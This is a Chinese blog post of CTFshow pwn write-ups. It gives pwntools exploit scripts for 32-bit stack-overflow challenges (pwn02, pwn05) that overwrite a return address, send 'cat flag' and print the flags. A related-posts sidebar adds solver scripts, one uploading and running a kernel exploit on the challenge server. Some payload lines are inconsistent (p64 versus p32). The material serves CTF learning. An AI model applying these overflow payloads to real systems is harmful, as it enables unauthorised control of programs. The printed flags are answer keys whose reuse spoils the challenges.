CTFshow-pwn刷题

原创 已于 2025-01-01 19:09:08 修改 · 554 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #大数据 #运维 #web安全 #网络 #linux #c语言

于 2025-01-01 19:08:30 首次发布

pwn02

32位的

双击pwnme这个函数

fgets函数,栈溢出

s的地址是-9,目标r的地址是4

这里有一个stack函数

地址是0x804850F

payload:

payload = b'a'*(0x9+4) + p64(0x0804850F)

exp

from pwn import*
p = remote('pwn.challenge.ctf.show',28185)
payload = b'a'*(0x9+4) + p32(0x0804850F)
p.sendline(payload)
p.sendline('cat flag')
p.interactive()

ctfshow{95cc7be7-bc2d-412b-9633-7131b3b507c3}

pwn05

32位的

F5main函数之后

双击welcome

双击s

s的地址是-14,目标地址r是4

getFlag的地址是:

0x8048486

构造payload

payload=b"a"*(0x14+4)+p32(0x08048486)

exp

from pwn import*
p = remote('pwn.challenge.ctf.show',28169)
payload=b"a"*(0x12+6)+p32(0x08048486)
p.sendline(payload)
p.sendline('cat flag')
p.interactive()

ctfshow{33456f1e-e589-4481-8e0c-465b3317b85d}

ctfshow笔记—栈溢出pwn53~pwn56
Yilanchia的博客
02-19 898
它先循环读取,每次一个字节,直到读取到换行符(ascll:10 0xa),循环读取才会结束,__isoc99_sscanf(v2,”%d”,&nbytes)这个函数从v2中读取一个整数,存放到nbytes变量中,这个变量决定了我们能够向buf写入的数据大小,我们想要造成溢出,这个数据就需要大一点,接下来,就去比较s1与global_canary是否相同,相同这个函数才能正常返回,造成溢出。,应该需要找到flag之间的关系。主要是提示用户输入数据,输出欢迎信息并让用户输入密码,进行比较,以便执行flag。
BUUCTF-PWN记录25(IO file attack)
weixin_44145820的博客
08-14 1799
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
c语言fgets()和read()的区别以及pwn目中需要设置setbuf的原理。
fjh1997的博客
01-30 2335
fgets是一个c语言函数, read 是一个系统调用 fgets是标准c函数, read不是 fgets 读取的数据会存到缓冲区, read不会 fgets 通过文件指针读文件, read 使用文件描述符读文件 fgets 遇到回车就停止读取, 而read遇到回车、空格、\x00都不管,它会一直读取你让他读取的字节数,而如果在还没读取完需要的字节数前就已经空了,那么read将分类讨论(在管道通信的情况下,不是读文件): 此时如果没有进程在往这个管道里写东西(也就是把这个管道关闭了),read()就不报错,
2018 10 11 pwn的学习0x2 gets函数fgets函数 ,新的参数传递方式
startr4ck
10-11 1588
还是一一样的没有binsh字符串 所以我们需要继续读取字符串到内存当中  在id中寻找函数 发现并没有我们想要的提权函数 我们可以尝试着搜索gadgets去寻找我们想要找到的 看到有汇编代码   mov dword ptr[edi],ebp 和 pop edi ebp pop edi ebp 后面就跟参数edi 放地址,ebp放数值。 就可以将ebp的数值放在edi位置上   直接利...
PWN PWN PWN !!! 技巧 (5)
Xzzzz911的博客
11-02 890
紧接上续四部,这次准备记录一下常见的函数的功能(容易忘记,记录一手),好记性不如烂笔头了解函数的作用,可以更好的让我们在代码审计的过程理清程序的之间的逻辑,加油加油!!!
CTFshow PWN入门 pwn02
question55的博客
09-15 1435
ctf pwn溢出漏洞 ctf入门 ctfshow
【二进制安全PWN基础入门大全(非常详细),零基础入门到精通,看这一篇就够了
2401_84618514的博客
11-07 5888
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
ctfshow 内部赛 pwn 签到
SCP000111的博客
11-16 2110
ctfshow 内部赛 pwn 签到 找了在的中,不会做这道,找了好久没找到wp,搞了几天,还怀疑目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的目似乎与这道一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
ctfshow笔记—栈溢出pwn61~pwn64
Yilanchia的博客
03-02 1269
此外,leave ret 之后,程序可能会跳转到一个无效地址,导致崩溃。这几道都是与shellcode有关的,实在是不会写,还是试了试,记录一下,收集了一些shellcode。根据之前学的知识,7(port参数)是可读可写的意思,所以,我们任然可以注入shellcode。关于shellcode我也不会写,所以去搜了一些shellcode,一般情况下还是能用的。遇到的一个问是shellcode太长,超出了v4,v5的范围,这是为什么呢?也是地址随机化,提前运行的界面和上一道差不多,会给一个地址。
ctfshow笔记—栈溢出pwn75~pwn79
Yilanchia的博客
04-14 1022
其核心思想是利用程序中某些寄存器指向的地址(如栈上的缓冲区地址),并通过查找 jmp reg 或 call reg 指令,将程序的控制流转移到该寄存器指向的地址,从而执行注入的 shellcode。当然需要用到rdi,ret。主要原因就是栈溢出之后,比如这道剩下的栈空间已经不足以装下整个payload,利用栈迁移就可以将esp这个栈指针指向新的栈空间,这样就可以继续写入我们的payload了。每次迁移时,都需要提前计算并布置好新的栈空间的地址信息,以便在执行leave指令时能够正确地迁移到新的栈空间。
ctf.show--pwn入门做记录(一)
2401_87685579的博客
11-16 502
ctfshow的个人做思路
网络安全威胁——缓冲区溢出攻击
聚集机器学习、信息安全
11-05 8911
攻击者可以利用缓冲区溢出修改计算机的内存,破坏或控制程序的执行,导致数据损坏、程序崩溃,甚至是恶意代码的执行。
ctfshow pwn学习笔记
Scarehehe的博客
11-30 6874
文章目录pwn入门pwn签到pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
2018 10 24. pwn的学习堆的学习,堆块,堆表的概念,堆当中的操作,什么是双向链表,堆分配函数fgets函数能造成溢出吗?
startr4ck
10-24 401
堆的学习     堆,动态增长的链表,     申请方式:常用函数申请,通过返回的指针使用,malloc()     释放方式:通过free进行释放     管理方式:需要程序员处理申请和释放     增长方向:内存从低地址向高地址     特点:         杂乱:堆区经过反复的申请,释放操作之后,原本大片连续的空闲区呈现出大小不同且空闲块和占用块交错的区域               给出...
简单的栈溢出(记录pwn入门)
pdxbshx的博客
11-07 859
没有PIE:ret2libcNX关闭:ret2shellcode其他思路:ret2csu、ret2text。
【BUUCTFPWN】ez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移
m0_55368674的博客
01-19 502
【BUUCTFPWN】ez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移
pwnnum22----溢出(c++)
tbsqigongzi的博客
04-25 1473
BUUCTF-PWN-pwn1_sctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 主函数调用一个vuln()函数 和平常不一样,这次是c++代码 首先让我们输入一个字符串,发现函数fgets,但是该函数只读取0x20个字节,而s有0
PWN简单堆栈溢出漏洞利用(一)
SkYe's Blog
08-12 2440
gets 函数溢出 目来源 下载链接(密码akcz) 目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag 创建办法: 在/home/pwn/pwn0目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链接的ELF...
buu pwn——分类型1——gets溢出无脑填充
苗_的博客
09-07 1445
gets漏洞 gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。 栈结构: (图自ctf-wiki) warmup_csaw_2016 找到gets漏洞,v5到rbp有0x40的内存 无脑填充即可:'a' * 0x40 + 'b' * 8 + p64(0x40060d) exp #!/usr/bin/python from pwn import * r = remote('no
ctfshow-pwnwp
最新发布
09-17
CTFShow平台PWN的解思路和过程在不同目中有所不同。以CTFSHOW PWN02为例,解脚本通过`pwn`库进行操作。脚本根据`contect`变量的值来选择是本地运行程序还是远程连接目标服务器。构造了长度为13个字节的`a`字符的`payload`,并拼接上函数地址`0X804850F`,将其发送给目标程序,最后进入交互模式与程序进行交互,可能是通过溢出覆盖返回地址来执行指定函数,以达到解目的[^1]。 对于CTFShow PWN入门的Kernel PWN 356 - 360相关目,解脚本先将本地的`exp`文件内容进行Base64编码,然后分块发送到远程服务器上的`/tmp/b64_exp`文件中。接着将Base64编码的内容解码成可执行文件`/tmp/exploit`,为其添加执行权限,最后执行该文件并进入交互模式。该过程可能是利用内核漏洞,通过上传并执行本地编写的漏洞利用脚本,来获取远程服务器的控制权[^3]。 ### 代码示例 CTFSHOW PWN02解脚本: ```python from pwn import * contect = 1 def main(): if contect == 0: p = process("./stack") else: p = remote("pwn.challenge.ctf.show", 28103) payload = b'a' * 13 payload += p32(0X804850F) p.sendline(payload) p.interactive() main() ``` CTFShow PWN入门Kernel PWN相关目的解脚本: ```python from pwn import * import base64 context.log_level = "debug" with open("./exp", "rb") as f: exp = base64.b64encode(f.read()) p = remote("pwn.challenge.ctf.show", 28304) p.recvuntil(b"$ ") p.sendline(b"ls") count = 0 for i in range(0, len(exp), 0x200): p.recvuntil(b"/ $ ") p.sendline("echo -n \"" + exp[i:i + 0x200].decode() + "\" >> /tmp/b64_exp") count += 1 log.info("count: " + str(count)) p.sendline("cat /tmp/b64_exp | base64 -d > /tmp/exploit") p.sendline("chmod +x /tmp/exploit") p.sendline("/tmp/exploit ") p.interactive() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小丑001.

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值